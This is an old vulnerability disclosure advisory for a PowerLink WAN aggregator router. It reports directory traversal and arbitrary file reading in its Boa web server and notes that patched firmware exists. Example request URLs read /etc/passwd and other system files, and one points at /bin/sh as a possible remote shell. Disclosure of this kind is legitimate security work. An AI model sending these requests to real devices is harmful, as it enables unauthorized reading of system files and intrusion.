------------------------------------------------------------
        - EXPL-A-2004-003 exploitlabs.com Advisory 029 -
------------------------------------------------------------
             - AstroCorp PowerLink WAN Aggregator -




OVERVIEW
========

"PowerLinkT WAN Aggregator is an Intelligent Link Load Balancing
with Automatic WAN Fail-Over for 100% Always Available Internet
Connectivity! An interesting way to increase Broadband bandwidth
among several connections. Simply put - (4) Incoming WAN Ports
 & (1) LAN port, Web Browser Configurable.
Balance that Load! Let's see, this device (PowerLink) + Smoothwall.org
for a Hardware Firewall - Nice! PowerLink-Iplus WAN Aggregator for
$1,695.00 (8/13/2002)."

note:
 this Advisory is a formal update to:
 http://www.securityfocus.com/archive/1/321044


AFFECTED PRODUCTS
=================
PowerLinkT WAN Aggregator
Version: 1.7.3.1

AstroCorp
http://www.astrocorp.com/


DETAILS
=======
1. Arbitrary reading of files
2. Directory Transversal
3. Remote Shell?


Known issues exist in Boa httpd as per:
FreeBSD-SA-00:60 Security Advisory

http://www.securiteam.com/unixfocus/6G0081P0AI.html and
http://lists.insecure.org/lists/bugtraq/2000/Oct/0445.html

note:
 This is a hardware based product with built in httpd for
 remote access, this is a seperate issue than the ones
 formaly presented above, but carry the same implications.


Identification:

HTTP/1.0 200 OK
Date: Saturday, 7 January 100 04:23:02 GMT
Server: Boa/0.92r


Items 1,2
---------

Just issue any of the folowing...

http://somepowerlinkWAN.router/../../../../../../../../../../etc/passwd
http://somepowerlinkWAN.router///etc/passwd
http://somepowerlinkWAN.router/etc/passwd
http://somepowerlinkWAN.router/bin/
http://somepowerlinkWAN.router/dev/
http://somepowerlinkWAN.router/tmp/
http://somepowerlinkWAN.router/etc/fstab
http://somepowerlinkWAN.router/etc/mtab

Item 3
------

http://somepowerlinkWAN.router/bin/sh


SOLUTION:
=========

Vendor has released updated firmware
Please upgrade to the latest version of

PowerLink firmware 1.8.16(4).


01/10/2003 Vendor contacted via telephone

05/07/2003 Initial Advisory released
http://www.securityfocus.com/archive/1/321044

06/04/2004 Issue Resolved - Patch Released                                                                                                                                                                                                                             



Credits
=======
This vulnerability was discovered and researched by 
Donnie Werner of exploitlabs

Donnie Werner

mail:	morning_wood@zone-h.org
-- 
web:	http://exploitlabs.com
web:	http://zone-h.org